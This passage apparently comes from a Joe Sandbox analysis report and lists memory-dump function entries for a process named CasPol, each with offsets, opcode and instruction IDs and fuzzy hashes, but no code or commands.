                                                                                            • Source File: 00000005.00000002.2220001097.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_6e0000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2863861424-0
                                                                                            • Opcode ID: c0330beb6a998ed9b16cfff69c7623229c75735da5cbfba11ba120771c775be4
                                                                                            • Instruction ID: 1a8a30188b6d7ce1b973eeb61b8e4acfca4d7225420cb41257083a118afa3de1
                                                                                            • Opcode Fuzzy Hash: c0330beb6a998ed9b16cfff69c7623229c75735da5cbfba11ba120771c775be4
                                                                                            • Instruction Fuzzy Hash: 0311F5B59003498FDB20DFAAC4457DEFBF5EF48314F208419D519A7244CB79A544CBA5
                                                                                            Function 0063D054 Relevance: .1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219634143.000000000063D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_63d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cda025dbdbb256a8ddf8b89b7f883774600971e8b2eca03a790d226935324963
                                                                                            • Instruction ID: 0b4533ef6d8a4d6be30176a8bdd02d199e06ff7c519a4e95be44a696b159cfa2
                                                                                            • Opcode Fuzzy Hash: cda025dbdbb256a8ddf8b89b7f883774600971e8b2eca03a790d226935324963
                                                                                            • Instruction Fuzzy Hash: 2A21C471504240DFCB19DF14E9C0B26BF66FB88714F24C669E9090A256C33AD826DBA1
                                                                                            Function 0063D5CC Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219634143.000000000063D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_63d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 34cb352f111f05d10a6acc2de0d1ac0245d18e8bba35c4bb12a039a3ddd2be18
                                                                                            • Instruction ID: c9510a3b337de9ca2a6b329605edfb14b404faa9c7c01e3cf16b6f4ac4515728
                                                                                            • Opcode Fuzzy Hash: 34cb352f111f05d10a6acc2de0d1ac0245d18e8bba35c4bb12a039a3ddd2be18
                                                                                            • Instruction Fuzzy Hash: E22145B1100244EFCB05DF14E9C0F26BF66FB99324F208569E9090B356C33AD856C7E1
                                                                                            Function 0064D3B0 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219681027.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_64d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ba136d438169e11f541d93e9ecbb044599131e887fa71d0fb4ab76421e04c555
                                                                                            • Instruction ID: 6fb1cfae54ae55619b12e4861cc231322c6f78c43e88caf42783945a16e493e7
                                                                                            • Opcode Fuzzy Hash: ba136d438169e11f541d93e9ecbb044599131e887fa71d0fb4ab76421e04c555
                                                                                            • Instruction Fuzzy Hash: 9F210471A04204DFCB05DF54D9C4B26BBA6FB88314F20C56DE9094B396C33AE806CA62
                                                                                            Function 0064D200 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219681027.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_64d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4cd24c2efccf27a0112dda03c0b37c40d2bafeda34511ae2afb4a1b0dd165b55
                                                                                            • Instruction ID: 4dfc56a1beacd32e107c5aa0d1f039d7ad4748a945e15c31754334688a04a333
                                                                                            • Opcode Fuzzy Hash: 4cd24c2efccf27a0112dda03c0b37c40d2bafeda34511ae2afb4a1b0dd165b55
                                                                                            • Instruction Fuzzy Hash: 3F215B71904204DFDB01DF14D5C4B27FFA6FB98324F20C669EA094B346C3BAD906C6A2
                                                                                            Function 0063D04F Relevance: .1, Instructions: 58COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219634143.000000000063D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_63d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                                                                                            • Instruction ID: c60339221b03339d16a577fb704086bc68900040658057e479a7b9cdca4a9827
                                                                                            • Opcode Fuzzy Hash: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                                                                                            • Instruction Fuzzy Hash: 1A21A276504280DFCF16CF10D9C4B56BF72FB98314F24C6A9D9490B256C33AD426DB91
                                                                                            Function 0063D5C7 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219634143.000000000063D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_63d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                            • Instruction ID: e6a18a90bcd48f3de67cd7000afdfbd4be6d0243bd90b356cd73c1dc6fc2fb1b
                                                                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                            • Instruction Fuzzy Hash: BC11E676504284DFCB06CF10E9C4B56BF72FB99314F24C6A9D9490B356C336D85ACBA2
                                                                                            Function 0064D3AB Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219681027.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_64d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                            • Instruction ID: cd418bb59890e182c9521465f3044cd30030a5975c4c83657c163c3f93688af7
                                                                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                            • Instruction Fuzzy Hash: 2211BB75904280DFCB02CF14D5C4B15BBA2FB84314F24C6AAD9494B756C33AE80ACBA2
                                                                                            Function 0064D1FB Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219681027.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_64d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                                                                            • Instruction ID: 6b17d65195f635d4de12a00855bf3c5c458ee47e638ed13e06be6bdb7d2fd502
                                                                                            • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                                                                            • Instruction Fuzzy Hash: 5311E275904280CFDB02CF10D5C4B56FF62FB84324F24C6AAD9490B756C37AD90ACB62